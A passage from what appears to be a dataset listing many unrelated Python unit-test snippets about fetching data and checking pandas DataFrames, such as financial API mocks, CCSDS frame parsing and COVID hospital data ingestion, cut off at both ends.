\"https://www.alphavantage.co/query?function=SECTOR&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = sp.get_sector()\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def test_open_fill(self):", "def testCircuitFetch(self):\n\n timeCol = 'timestamp'\n rows = []\n for row in self.aggregator.rawData(dataType = 'circuit',\n orderBy = [timeCol, 'circuit'],\n timestampCol = timeCol,\n startDate = self.testStart,\n endDate = self.testEnd):\n rows.append(row)\n self.assertIsNotNone(rows, 'Rows are present.')", "def test_stream_to_data_frame():\n # -- Setup - Create archive in main memory --------------------------------\n archive = Archive()\n for df in [DF1, DF2, DF3]:\n doc = DataFrameDocument(df=df)\n archive.commit(doc)\n # -- Read dataframes for first two snapshots ------------------------------\n #\n # The snapshots are only identical if the data frames where sorted by the\n # data frame index. Thus, the third snapshot will return a data frame in\n # different order.\n pd.testing.assert_frame_equal(archive.open(version=0).to_df(), DF1)\n pd.testing.assert_frame_equal(archive.open(version=1).to_df(), DF2)", "def test_readSongData():\n\n # make sure the number of columns pull out from the database is correct\n assert svd.song_df.shape[1] == 8", "def test_get_frame(mock_source):\n frame_ingestor = FrameIngestor(mock_source)\n frame_ingestor.get_frame()\n\n mock_source.get_frame.assert_called_once()", "def test_create_dataframe(chosen_columns, chosen_url):\n print(\"reading in data\")\n chosen_df = readindata(chosen_columns, chosen_url)\n print(\"checking columns\")\n checkcolumnstest(chosen_columns, chosen_df)\n print(\"checking types\")\n checktypestest(chosen_df)\n print(\"checking for Nan\")\n checkfornan(chosen_df)\n print(\"checking 1 row\")\n checkrowstest(chosen_df)\n return True", "async def test_fetch_filtered_dataset_call(self):\n pool = asynctest.CoroutineMock()\n db_response = {\"referenceBases\": '', \"alternateBases\": '', \"variantType\": \"\",\n \"referenceName\": 'Chr38',\n \"frequency\": 0, \"callCount\": 0, \"sampleCount\": 0, \"variantCount\": 0,\n \"start\": 0, \"end\": 0, \"accessType\": \"PUBLIC\", \"datasetId\": \"test\"}\n pool.acquire().__aenter__.return_value = Connection(accessData=[db_response])\n assembly_id = 'GRCh38'\n position = (10, 20, None, None, None, None)\n chromosome = 1\n reference = 'A'\n alternate = ('DUP', None)\n result = await fetch_filtered_dataset(pool, assembly_id, position, chromosome, reference, alternate, None, None, False)\n # for now it can return empty dataset\n # in order to get a response we will have to mock it\n # in Connection() class\n expected = {'referenceName': 'Chr38', 'callCount': 0, 'sampleCount': 0, 'variantCount': 0, 'datasetId': 'test',\n 'referenceBases': '', 'alternateBases': '', 'variantType': '', 'start': 0, 'end': 0, 'frequency': 0,\n 'info': {'accessType': 'PUBLIC'},\n 'datasetHandover': [{'handoverType': {'id': 'CUSTOM', 'label': 'Variants'},\n 'description': 'browse the variants matched by the query',\n 'url': 'https://examplebrowser.org/dataset/test/browser/variant/Chr38-1--'},\n {'handoverType': {'id': 'CUSTOM', 'label': 'Region'},\n 'description': 'browse data of the region matched by the query',\n 'url': 'https://examplebrowser.org/dataset/test/browser/region/Chr38-1-1'},\n {'handoverType': {'id': 'CUSTOM', 'label': 'Data'},\n 'description': 'retrieve information of the datasets',\n 'url': 'https://examplebrowser.org/dataset/test/browser'}]}\n\n self.assertEqual(result, [expected])", "def test_fetch_dataset(self):\n\n mock_pandas = MagicMock()\n mock_pandas.read_csv.return_value = sentinel.dataset\n\n result = Network.fetch_dataset(sentinel.url, pandas_impl=mock_pandas)\n\n self.assertEqual(result, sentinel.dataset)\n mock_pandas.read_csv.assert_called_once_with(sentinel.url, dtype=str)", "def test_frame_to_rows(self):\n pass", "def check_new_df(df):\n try:\n new_df = pull_modus()\n\n if assert_frame_equal(df, new_df):\n pass\n else:\n df = new_df.copy()\n\n return df\n \n except:\n pass # 'Modus URL not reachable'", "def test_fetch_metadata_for_dataset(self):\n\n with patch.object(pd, \"read_csv\") as func:\n func.return_value = pd.DataFrame(\n {\"Archive Link\": [\"test2\", \"test1\", \"test3\"],\n \"Update Date\": [\"2020/1/2\", \"2020/1/1\", \"2020/1/3\"]}\n )\n result = Network.fetch_metadata_for_dataset(\"test\")\n pd.testing.assert_frame_equal(\n result,\n pd.DataFrame(\n {\"Archive Link\": [\"test1\", \"test2\", \"test3\"],\n \"Update Date\": pd.date_range(\"2020/1/1\", \"2020/1/3\")}\n ).set_index(\"Update Date\")\n )\n func.assert_called_once_with(\n \"https://healthdata.gov/api/views/test/rows.csv\",\n dtype=str\n )", "def test_get_frame_no_source():\n frame_ingestor = FrameIngestor()\n with pytest.raises(RuntimeError):\n frame_ingestor.get_frame()", "def test_build_dataframe(self):\n insert_good_data()\n dataframe = get_dataframe()\n # 1 2 3\n self.assertIs(type(dataframe['Total'][0]), numpy.float64)\n self.assertIs(type(dataframe['InvoiceDate'][0]), str)\n self.assertIs(type(dataframe['Count'][0]), numpy.int64)\n # 4\n self.assertEqual(dataframe['Total'][0], 8198.79)\n # 5\n self.assertDataframeEqual(dataframe, get_equal_dataframe())\n alt_dataframe = get_alter_dataframe(self.database_connection)\n # 6\n self.assertNotEqual(alt_dataframe['Count'][0], dataframe['Count'][0])\n # 7\n with self.assertRaises(AssertionError):\n self.assertDataframeEqual(alt_dataframe, dataframe)\n # 8\n self.assertEqual(dataframe['Total'][0], alt_dataframe['Total'][0])", "def test_spotdb_reader(spotdb_data):\n\n db = spotdb_data\n\n reader = SpotDBReader(db)\n gfs = reader.read()\n\n assert len(gfs) == 4\n\n metrics = {\"Total time (inc)\", \"Avg time/rank (inc)\"}\n\n assert len(gfs[0].dataframe) > 2\n assert gfs[0].default_metric == \"Total time (inc)\"\n assert metrics < set(gfs[0].dataframe.columns)\n assert metrics < set(gfs[3].dataframe.columns)\n\n assert \"launchdate\" in gfs[0].metadata.keys()", "def fetch_data(self):", "def test_from_object_df(self):\n df_test = make_simple_dataframe()\n df_read = BaseDataClass.from_object(df_test).df\n self.assertEqual(\n pd.testing.assert_frame_equal(df_test, df_read),\n None,\n )", "def test_data_source_soaps_get(self):\n pass", "def test_handle_data(self):\n for close in ('higher', 'lower'):\n print 'close:', close\n self.hd_args['close'] = close\n self.df_stock = self.backtest.handle_data(self.backtest.df_stock, **self.hd_args)\n print self.df_stock.to_string(line_width=400)\n\n print '=' * 100\n\n new_columns = ('found0', 'found1', 'found2',\n 'open_to_high', 'open_to_low', 'open_to_close')\n for column in new_columns:\n self.assertIn(column, self.df_stock.columns)", "def test_fetch_from_wide_table(self):\n try:\n self.storage.store(RECORD_TABLE, value=\"a\", extra_column=\"EEK!\")\n a = self.clerk.fetch(Record, 1)\n a.value=\"aa\"\n self.clerk.store(a)\n except AttributeError:\n self.fail(\"shouldn't die when columns outnumber attributes\")", "def _fetch_data(self):\n pass", "def test_fill_data_with_close_in_strikes(self):\n date = pd.to_datetime('2009-03-31')\n print 'testing date: %s' % date.strftime('%Y-%m-%d')\n self.full_iv.get_data()\n self.full_iv.df_stock = self.full_iv.df_stock[date:date]\n df_iv = self.full_iv.calc_iv()\n\n print df_iv\n self.assertTrue(len(df_iv))", "def test_fetchall(self):\n result = export.processExport(houseId=1)\n #We should have 2 locations * 1 sensor * 10 days of data here\n # 2 * 1 * (288 * 10) == 5670\n #print result.shape\n\n #result.to_csv(\"temp.csv\")\n #Do we get the right object\n self.assertEqual(type(result), pandas.DataFrame)\n #And is it the right size\n self.assertEqual(result.shape, (2880, 2)) #So 2880 samples from two sensors\n #And the right range of data\n self.assertEqual(result.index[0], datetime.datetime(2013, 01, 01))\n self.assertEqual(result.index[-1], datetime.datetime(2013, 01, 10, 23, 55))", "def test_number_of_rows_with_header(self):\n url=\"http://archive.ics.uci.edu/ml/machine-learning-databases/forest-fires/forestfires.csv\"\n\n reader=requester.url_to_df(url)\n rows,columns=reader.shape\n self.assertEqual(rows,517)", "def test_coin_api_load_df_for_ta(self, mock_load):\n\n with open(\"tests/data/btc_usd_test_data.json\", encoding=\"utf8\") as f:\n sample_return = json.load(f)\n\n mock_load.return_value = sample_return\n mock_return, vs = dd_pycoingecko_view.load_ta_data(\n self.coin, [\"--vs\", \"usd\", \"--days\", \"30\"]\n )\n self.assertTrue(mock_return.shape == (31, 4))\n self.assertTrue(vs == \"usd\")", "def test_FRAME_DUoperations():\n tmFrame0 = CCSDS.FRAME.TMframe()\n print(\"tmFrame0 =\", tmFrame0)\n print(\"\")\n tmFrame1 = CCSDS.FRAME.TMframe(testData.TM_FRAME_01)\n print(\"tmFrame1 =\", tmFrame1)\n if tmFrame1.versionNumber != testData.TM_FRAME_01_versionNumber:\n print(\"tmFrame1 versionNumber wrong:\", tmFrame1.versionNumber, \"- should be\", testData.TM_FRAME_01_versionNumber)\n return False\n if tmFrame1.spacecraftId != testData.TM_FRAME_01_spacecraftId:\n print(\"tmFrame1 spacecraftId wrong:\", tmFrame1.spacecraftId, \"- should be\", testData.TM_FRAME_01_spacecraftId)\n return False\n if tmFrame1.virtualChannelId != testData.TM_FRAME_01_virtualChannelId:\n print(\"tmFrame1 virtualChannelId wrong:\", tmFrame1.virtualChannelId, \"- should be\", testData.TM_FRAME_01_virtualChannelId)\n return False\n if tmFrame1.operationalControlField != testData.TM_FRAME_01_operationalControlField:\n print(\"tmFrame1 operationalControlField wrong:\", tmFrame1.operationalControlField, \"- should be\", testData.TM_FRAME_01_operationalControlField)\n return False\n if tmFrame1.masterChannelFrameCount != testData.TM_FRAME_01_masterChannelFrameCount:\n print(\"tmFrame1 masterChannelFrameCount wrong:\", tmFrame1.masterChannelFrameCount, \"- should be\", testData.TM_FRAME_01_masterChannelFrameCount)\n return False\n if tmFrame1.virtualChannelFCountLow != testData.TM_FRAME_01_virtualChannelFCountLow:\n print(\"tmFrame1 virtualChannelFCountLow wrong:\", tmFrame1.virtualChannelFCountLow, \"- should be\", testData.TM_FRAME_01_virtualChannelFCountLow)\n return False\n if tmFrame1.secondaryHeaderFlag != testData.TM_FRAME_01_secondaryHeaderFlag:\n print(\"tmFrame1 secondaryHeaderFlag wrong:\", tmFrame1.secondaryHeaderFlag, \"- should be\", testData.TM_FRAME_01_secondaryHeaderFlag)\n return False\n if tmFrame1.synchronisationFlag != testData.TM_FRAME_01_synchronisationFlag:\n print(\"tmFrame1 synchronisationFlag wrong:\", tmFrame1.synchronisationFlag, \"- should be\", testData.TM_FRAME_01_synchronisationFlag)\n return False\n if tmFrame1.packetOrderFlag != testData.TM_FRAME_01_packetOrderFlag:\n print(\"tmFrame1 packetOrderFlag wrong:\", tmFrame1.packetOrderFlag, \"- should be\", testData.TM_FRAME_01_packetOrderFlag)\n return False\n if tmFrame1.segmentLengthId != testData.TM_FRAME_01_segmentLengthId:\n print(\"tmFrame1 segmentLengthId wrong:\", tmFrame1.segmentLengthId, \"- should be\", testData.TM_FRAME_01_segmentLengthId)\n return False\n if tmFrame1.firstHeaderPointer != testData.TM_FRAME_01_firstHeaderPointer:\n print(\"tmFrame1 firstHeaderPointer wrong:\", tmFrame1.firstHeaderPointer, \"- should be\", testData.TM_FRAME_01_firstHeaderPointer)\n return False\n # extract packets and check it\n leadingFragment, packets, trailingFragment = tmFrame1.getPackets()\n if leadingFragment != testData.TM_FRAME_01_leadingFragment:\n print(\"tmFrame1 leadingFragment wrong:\", leadingFragment, \"- should be\", testData.TM_FRAME_01_leadingFragment)\n return False\n if len(packets) != testData.TM_FRAME_01_nrPackets:\n print(\"tmFrame1 nr. of packets wrong:\", len(packets), \"- should be\", testData.TM_FRAME_01_nrPackets)\n return False\n if trailingFragment != testData.TM_FRAME_01_trailingFragment:\n print(\"tmFrame1 trailingFragment wrong:\", trailingFragment, \"- should be\", testData.TM_FRAME_01_trailingFragment)\n return False\n print(\"\")\n tcFrame1 = CCSDS.FRAME.TCframe(testData.TC_FRAME_01)\n print(\"tcFrame1 =\", tcFrame1)\n if tcFrame1.versionNumber != testData.TC_FRAME_01_versionNumber:\n print(\"tcFrame1 versionNumber wrong:\", tcFrame1.versionNumber, \"- should be\", testData.TC_FRAME_01_versionNumber)\n return False\n if tcFrame1.reservedFieldB != testData.TC_FRAME_01_reservedFieldB:\n print(\"tcFrame1 reservedFieldB wrong:\", tcFrame1.reservedFieldB, \"- should be\", testData.TC_FRAME_01_reservedFieldB)\n return False\n if tcFrame1.virtualChannelId != testData.TC_FRAME_01_virtualChannelId:\n print(\"tcFrame1 virtualChannelId wrong:\", tcFrame1.virtualChannelId, \"- should be\", testData.TC_FRAME_01_virtualChannelId)\n return False\n if tcFrame1.controlCommandFlag != testData.TC_FRAME_01_controlCommandFlag:\n print(\"tcFrame1 controlCommandFlag wrong:\", tcFrame1.controlCommandFlag, \"- should be\", testData.TC_FRAME_01_controlCommandFlag)\n return False\n if tcFrame1.reservedFieldA != testData.TC_FRAME_01_reservedFieldA:\n print(\"tcFrame1 reservedFieldA wrong:\", tcFrame1.reservedFieldA, \"- should be\", testData.TC_FRAME_01_reservedFieldA)\n return False\n if tcFrame1.frameLength != testData.TC_FRAME_01_frameLength:\n print(\"tcFrame1 frameLength wrong:\", tcFrame1.frameLength, \"- should be\", testData.TC_FRAME_01_frameLength)\n return False\n if tcFrame1.sequenceNumber != testData.TC_FRAME_01_sequenceNumber:\n print(\"tcFrame1 sequenceNumber wrong:\", tcFrame1.sequenceNumber, \"- should be\", testData.TC_FRAME_01_sequenceNumber)\n return False\n if tcFrame1.spacecraftId != testData.TC_FRAME_01_spacecraftId:\n print(\"tcFrame1 spacecraftId wrong:\", tcFrame1.spacecraftId, \"- should be\", testData.TC_FRAME_01_spacecraftId)\n return False\n if tcFrame1.bypassFlag != testData.TC_FRAME_01_bypassFlag:\n print(\"tcFrame1 bypassFlag wrong:\", tcFrame1.bypassFlag, \"- should be\", testData.TC_FRAME_01_bypassFlag)\n return False\n tcFrame2 = CCSDS.FRAME.TCframe(testData.TC_FRAME_02)\n if tcFrame2.versionNumber != testData.TC_FRAME_02_versionNumber:\n print(\"tcFrame2 versionNumber wrong:\", tcFrame2.versionNumber, \"- should be\", testData.TC_FRAME_02_versionNumber)\n return False\n if tcFrame2.reservedFieldB != testData.TC_FRAME_02_reservedFieldB:\n print(\"tcFrame2 reservedFieldB wrong:\", tcFrame2.reservedFieldB, \"- should be\", testData.TC_FRAME_02_reservedFieldB)\n return False\n if tcFrame2.virtualChannelId != testData.TC_FRAME_02_virtualChannelId:\n print(\"tcFrame2 virtualChannelId wrong:\", tcFrame2.virtualChannelId, \"- should be\", testData.TC_FRAME_02_virtualChannelId)\n return False\n if tcFrame2.controlCommandFlag != testData.TC_FRAME_02_controlCommandFlag:\n print(\"tcFrame2 controlCommandFlag wrong:\", tcFrame2.controlCommandFlag, \"- should be\", testData.TC_FRAME_02_controlCommandFlag)\n return False\n if tcFrame2.reservedFieldA != testData.TC_FRAME_02_reservedFieldA:\n print(\"tcFrame2 reservedFieldA wrong:\", tcFrame2.reservedFieldA, \"- should be\", testData.TC_FRAME_02_reservedFieldA)\n return False\n if tcFrame2.frameLength != testData.TC_FRAME_02_frameLength:\n print(\"tcFrame2 frameLength wrong:\", tcFrame2.frameLength, \"- should be\", testData.TC_FRAME_02_frameLength)\n return False\n if tcFrame2.sequenceNumber != testData.TC_FRAME_02_sequenceNumber:\n print(\"tcFrame2 sequenceNumber wrong:\", tcFrame2.sequenceNumber, \"- should be\", testData.TC_FRAME_02_sequenceNumber)\n return False\n if tcFrame2.spacecraftId != testData.TC_FRAME_02_spacecraftId:\n print(\"tcFrame2 spacecraftId wrong:\", tcFrame2.spacecraftId, \"- should be\", testData.TC_FRAME_02_spacecraftId)\n return False\n if tcFrame2.bypassFlag != testData.TC_FRAME_02_bypassFlag:\n print(\"tcFrame2 bypassFlag wrong:\", tcFrame2.bypassFlag, \"- should be\", testData.TC_FRAME_02_bypassFlag)\n return False\n clcw = CCSDS.FRAME.CLCW()\n print(\"clcw =\", clcw)\n return True", "def test_observation_info(dl1_file):\n from ctapipe.io.tableloader import TableLoader\n\n with TableLoader(dl1_file, load_observation_info=True) as table_loader:\n table = table_loader.read_telescope_events()\n assert \"subarray_pointing_lat\" in table.colnames", "def test_get_df_db(oracle_connector):\n data_sources_spec = [\n {\n 'domain': 'Oracle test',\n 'type': 'external_database',\n 'name': 'my_oracle_sql_con',\n 'query': 'SELECT * FROM City;',\n }\n ]\n\n data_source = OracleSQLDataSource(**data_sources_spec[0])\n df = oracle_connector.get_df(data_source)\n\n assert not df.empty\n assert df.shape == (50, 5)\n assert set(df.columns) == {'ID', 'NAME', 'COUNTRYCODE', 'DISTRICT', 'POPULATION'}\n\n assert len(df[df['POPULATION'] > 500000]) == 5", "def test_crypto_currencies_pandas_python2(self, mock_urlopen):\n cc = CryptoCurrencies(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=DIGITAL_CURRENCY_INTRADAY&symbol=BTC&market=CNY&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = cc.get_digital_currency_intraday(\n symbol='BTC', market='CNY')\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def test_get_record(self):\n pass", "def testReadDataFile(self):\n try:\n blockNameList = []\n myReader = ParseCifSimple(self.__pathPdbxDataFile, False, 0, 255, \"?\", self.__logFileName)\n blockNameList = myReader.GetBlockNames(blockNameList)\n #\n for blockName in blockNameList:\n block = myReader.GetBlock(blockName)\n tableNameList = []\n tableNameList = block.GetTableNames(tableNameList)\n for tableName in tableNameList:\n table = block.GetTable(tableName)\n columnNameList = table.GetColumnNames()\n logger.debug(\"Table %s colunms %r\", tableName, columnNameList)\n numRows = table.GetNumRows()\n rowList = []\n for iRow in range(0, numRows):\n row = table.GetRow(iRow)\n rowList.append(row)\n logger.debug(\"table %s row length %d\", tableName, len(rowList))\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()", "def test_read_data(dbh):\n assert len(dbh.trading_history) == 0\n dbh.read_data()\n assert len(dbh.trading_history) > 0\n dbh.trading_history = []\n assert len(dbh.trading_history) == 0\n dbh.read_data(currentdir+'/../test/test_data/trading_log.json')\n assert len(dbh.trading_history) > 0", "def test_acquire_dataset(self):\n\n # make sure the data does not yet exist\n with self.subTest(name='no data yet'):\n response = Epidata.covid_hosp('MA', Epidata.range(20200101, 20210101))\n self.assertEqual(response['result'], -2)\n\n # acquire sample data into local database\n # mock out network calls to external hosts\n with self.subTest(name='first acquisition'), \\\n patch.object(Network, 'fetch_metadata', return_value=self.test_utils.load_sample_metadata()) as mock_fetch_meta, \\\n patch.object(Network, 'fetch_dataset', side_effect=[self.test_utils.load_sample_dataset(\"dataset0.csv\"), # dataset for 3/13\n self.test_utils.load_sample_dataset(\"dataset0.csv\"), # first dataset for 3/15\n self.test_utils.load_sample_dataset()] # second dataset for 3/15\n ) as mock_fetch:\n acquired = Update.run()\n self.assertTrue(acquired)\n self.assertEqual(mock_fetch_meta.call_count, 1)\n\n # make sure the data now exists\n with self.subTest(name='initial data checks'):\n response = Epidata.covid_hosp('WY', Epidata.range(20200101, 20210101))\n self.assertEqual(response['result'], 1)\n self.assertEqual(len(response['epidata']), 1)\n row = response['epidata'][0]\n self.assertEqual(row['state'], 'WY')\n self.assertEqual(row['date'], 20201209)\n self.assertEqual(row['issue'], 20210315)\n self.assertEqual(row['critical_staffing_shortage_today_yes'], 8)\n actual = row['inpatient_bed_covid_utilization']\n expected = 0.11729857819905214\n self.assertAlmostEqual(actual, expected)\n self.assertIsNone(row['critical_staffing_shortage_today_no'])\n\n # expect 61 fields per row (63 database columns, except `id` and `record_type`)\n self.assertEqual(len(row), 61)\n\n with self.subTest(name='all date batches acquired'):\n response = Epidata.covid_hosp('WY', Epidata.range(20200101, 20210101), issues=20210313)\n self.assertEqual(response['result'], 1)\n\n # re-acquisition of the same dataset should be a no-op\n with self.subTest(name='second acquisition'), \\\n patch.object(Network, 'fetch_metadata', return_value=self.test_utils.load_sample_metadata()) as mock_fetch_meta, \\\n patch.object(Network, 'fetch_dataset', return_value=self.test_utils.load_sample_dataset()) as mock_fetch:\n acquired = Update.run()\n self.assertFalse(acquired)\n\n # make sure the data still exists\n with self.subTest(name='final data checks'):\n response = Epidata.covid_hosp('WY', Epidata.range(20200101, 20210101))\n self.assertEqual(response['result'], 1)\n self.assertEqual(len(response['epidata']), 1)", "def test_context_data(self):\n response = self.client.get(self.get_url())\n context = response.context\n self.assertIn('source_dataset_table', context)\n for ds in self.datasets:\n self.assertIn(ds, context['source_dataset_table'].data)\n self.assertIsInstance(context['source_dataset_table'], tables.SourceDatasetTableFull)", "def test_sector_perfomance_python2(self, mock_urlopen):\n sp = SectorPerformances(key=TestAlphaVantage._API_KEY_TEST)\n url = \"https://www.alphavantage.co/query?function=SECTOR&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = sp.get_sector()\n self.assertIsInstance(\n data, dict, 'Result Data must be a dictionary')", "def test_sector_perfomance_pandas(self, mock_request):\n sp = SectorPerformances(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = \"http://www.alphavantage.co/query?function=SECTOR&apikey=test\"\n path_file = self.get_file_from_url(\"mock_sector\")\n with open(path_file) as f:\n mock_request.get(url, text=f.read())\n data, _ = sp.get_sector()\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def test_open_order_sheet(self):\n order_processor = OrderProcessor()\n order_processor.open_order_sheet('COMP_3522_A4_orders.xlsx')\n self.assertTrue(self, isinstance(order_processor.orders_data_frame,\n DataFrame))", "def test_zero_lookback_window(self, mock_get_prices):\n class BuyBelow10(Moonshot):\n \"\"\"\n A basic test strategy that buys below 10.\n \"\"\"\n DB = 'test-db'\n LOOKBACK_WINDOW = 0\n\n def prices_to_signals(self, prices):\n signals = prices.loc[\"Close\"] < 10\n return signals.astype(int)\n\n def _mock_get_prices():\n\n dt_idx = pd.DatetimeIndex([\"2018-05-01\",\"2018-05-02\",\"2018-05-03\", \"2018-05-04\"])\n fields = [\"Close\",\"Volume\"]\n idx = pd.MultiIndex.from_product([fields, dt_idx], names=[\"Field\", \"Date\"])\n\n prices = pd.DataFrame(\n {\n \"FI12345\": [\n #Close\n 9,\n 11,\n 10.50,\n 9.99,\n # Volume\n 5000,\n 16000,\n 8800,\n 9900\n ],\n \"FI23456\": [\n # Close\n 9.89,\n 11,\n 8.50,\n 10.50,\n # Volume\n 15000,\n 14000,\n 28800,\n 17000\n\n ],\n },\n index=idx\n )\n\n return prices\n\n def mock_download_master_file(f, *args, **kwargs):\n\n master_fields = [\"Timezone\", \"Symbol\", \"SecType\", \"Currency\", \"PriceMagnifier\", \"Multiplier\"]\n securities = pd.DataFrame(\n {\n \"FI12345\": [\n \"America/New_York\",\n \"ABC\",\n \"STK\",\n \"USD\",\n None,\n None\n ],\n \"FI23456\": [\n \"America/New_York\",\n \"DEF\",\n \"STK\",\n \"USD\",\n None,\n None,\n ]\n },\n index=master_fields\n )\n securities.columns.name = \"Sid\"\n securities.T.to_csv(f, index=True, header=True)\n f.seek(0)\n\n mock_get_prices.return_value = _mock_get_prices()\n\n with patch(\"moonshot.strategies.base.download_master_file\", new=mock_download_master_file):\n results = BuyBelow10().backtest(start_date=\"2018-05-01\", end_date=\"2018-05-04\")\n\n get_prices_call = mock_get_prices.mock_calls[0]\n _, args, kwargs = get_prices_call\n self.assertListEqual(kwargs[\"codes\"], [\"test-db\"])\n self.assertEqual(kwargs[\"start_date\"], \"2018-05-01\")\n self.assertEqual(kwargs[\"end_date\"], \"2018-05-04\")\n self.assertEqual(kwargs[\"fields\"], ['Open', 'Close', 'Volume'])\n self.assertIsNone(kwargs[\"timezone\"])\n self.assertTrue(kwargs[\"infer_timezone\"])", "def test_get_metadata_df(self):\n\n # first need to populate LabMetadata tables\n from data_processors.lims.lambdas import labmetadata\n labmetadata.scheduled_update_handler({'event': \"test_get_metadata_df\"}, None)\n\n logger.info(f\"Lab metadata count: {LabMetadata.objects.count()}\")\n\n # SEQ-II validation dataset\n mock_bcl_workflow: Workflow = WorkflowFactory()\n mock_sqr: SequenceRun = mock_bcl_workflow.sequence_run\n mock_sqr.run_id = \"r.Uvlx2DEIME-KH0BRyF9XBg\"\n mock_sqr.instrument_run_id = \"200612_A01052_0017_BH5LYWDSXY\"\n mock_sqr.gds_volume_name = \"bssh.acddbfda498038ed99fa94fe79523959\"\n mock_sqr.gds_folder_path = f\"/Runs/{mock_sqr.instrument_run_id}_{mock_sqr.run_id}\"\n mock_sqr.sample_sheet_name = \"SampleSheet.csv\"\n mock_sqr.name = mock_sqr.instrument_run_id\n mock_sqr.save()\n\n mock_library_run = LibraryRun(\n instrument_run_id=mock_sqr.instrument_run_id,\n run_id=mock_sqr.run_id,\n library_id=\"L2000199\",\n lane=1,\n override_cycles=\"Y151;I8N2;U10;Y151\",\n )\n mock_library_run.save()\n\n samplesheet_path = f\"{mock_sqr.gds_folder_path}/{mock_sqr.sample_sheet_name}\"\n\n metadata_df = bcl_convert.get_metadata_df(\n gds_volume=mock_sqr.gds_volume_name,\n samplesheet_path=samplesheet_path\n )\n\n logger.info(\"-\" * 32)\n logger.info(f\"\\n{metadata_df}\")\n\n self.assertTrue(not metadata_df.empty)\n self.assertTrue(\"PTC_SsCRE200323LL_L2000172_topup\" in metadata_df[\"sample\"].tolist())\n\n if \"\" in metadata_df[\"override_cycles\"].unique().tolist():\n logger.info(\"-\" * 32)\n logger.info(\"THERE SEEM TO BE BLANK OVERRIDE_CYCLES METADATA FOR SOME SAMPLES...\")\n self.assertFalse(\"\" in metadata_df[\"override_cycles\"].tolist())\n # This probably mean need to fix data, look for corresponding Lab Metadata entry...\n\n library_id_list = metadata_df[\"library_id\"].tolist()\n library_run_list = libraryrun_srv.link_library_runs_with_x_seq_workflow(library_id_list, mock_bcl_workflow)\n self.assertIsNotNone(library_run_list)\n self.assertEqual(1, len(library_run_list))\n self.assertEqual(mock_library_run.library_id, library_run_list[0].library_id)\n\n library_run_in_workflows = mock_bcl_workflow.libraryrun_set.all()\n self.assertEqual(1, library_run_in_workflows.count())", "def test_get_records(self):\n pass", "def test_read(self):\n df = dep.read_env(get_path('good_env.txt'))\n df2 = df[df['date'] == datetime.datetime(2010, 6, 5)]\n self.assertEqual(len(df2.index), 1)\n row = df2.iloc[0]\n self.assertEquals(row['runoff'], 86.3)", "def test_load_success_large_dataset(self, mock_class):\n\n # ARRANGE\n input_data = \"\"\"\n CHILDRENS HOSPITAL DIALYSIS,012306,013300,1600 7TH AVENUE SOUTH,-,BIRMINGHAM,AL,35233,99\n GADSDEN DIALYSIS,012501,-,409 SOUTH FIRST STREET,-,GADSDEN,AL,35901,100\n TUSCALOOSA UNIVERSITY DIALYSIS,012502,-,220 15TH STREET,-,TUSCALOOSA,AL,35401,0\n DOTHAN DIALYSIS,012506,-,216 GRACELAND DR.,-,DOTHAN,AL,36305,88\n \"\"\"\n input_df: DataFrame = self.create_data_frame_from_csv_string(input_data)\n\n # ACT\n loader: LoaderCsv = LoaderCsv({'path': TestLoaderCsv.output_file})\n loader.load(TestLoaderCsv.spark, input_df)\n\n # ASSERT\n path = f'file://{TestLoaderCsv.output_file}'\n df: DataFrame = TestLoaderCsv.spark.read.csv(path, header=True)\n # TODO: you can replace the above statement with code to read from\n # a database table; see case_study/etl/extract/extractor_db.py\n\n assert df.columns == [\n 'facility_name', 'cms_certification_number_ccn', 'alternate_ccn_1', 'address_1',\n 'address_2', 'city', 'state', 'zip_code', 'total_performance_score'\n ]\n assert df.count() == 4\n\n df.createOrReplaceTempView('loaded_data') # used in SQL queries below\n\n # verify one value of one row\n result: Row = self.spark.sql(\"\"\"\n select total_performance_score score \n from loaded_data\n where cms_certification_number_ccn == '012306'\n \"\"\").collect()[0]\n assert result.score == '99'\n\n # assert df.select(df.total_performance_score) \\\n # .where(df.cms_certification_number_ccn == '012306')\\\n # .collect()[0] == '99'\n\n # verify that a record is not present (i.e., it should have been\n # filtered out by the tranform operation)\n assert not self.spark.sql(\"\"\"\n select * \n from loaded_data\n where cms_certification_number_ccn == '012307'\n \"\"\").collect()", "def test_empty_data_frame(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n deproxy_cl.parsing = False\n request_body = \"123\"\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n deproxy_cl.make_request(request=\"\", end_stream=False)\n deproxy_cl.make_request(request=request_body, end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "def test_fetch():\n service = WebService(TestFactory())\n query = service.parse(\n parse_qs(\n \"id=BOU&starttime=2016-06-06\"\n \"&endtime=2016-06-07&elements=H,E,Z,F&sampling_period=60\"\n \"&format=iaga2002&type=variation\"\n )\n )\n timeseries = service.fetch(query)\n assert_equal(isinstance(timeseries, Stream), True)", "def testWeatherFetch(self):\n\n timeCol = 'timestamp'\n rows = []\n for row in self.aggregator.rawData(dataType = 'weather',\n orderBy = [timeCol],\n timestampCol = timeCol,\n startDate = self.testStart,\n endDate = self.testEnd):\n rows.append(row)\n self.assertIsNotNone(rows, 'Rows are present.')", "def _fetch_data(self, samples):\n pass", "def test_load_success_small_dataset(self, mock_class):\n\n # ARRANGE\n input_data = \"\"\"\n CHILDRENS HOSPITAL DIALYSIS,012306,013300,1600 7TH AVENUE SOUTH,-,BIRMINGHAM,AL,35233,99\n GADSDEN DIALYSIS,012501,-,409 SOUTH FIRST STREET,-,GADSDEN,AL,35901,100\n TUSCALOOSA UNIVERSITY DIALYSIS,012502,-,220 15TH STREET,-,TUSCALOOSA,AL,35401,0\n DOTHAN DIALYSIS,012506,-,216 GRACELAND DR.,-,DOTHAN,AL,36305,88\n \"\"\"\n input_df: DataFrame = 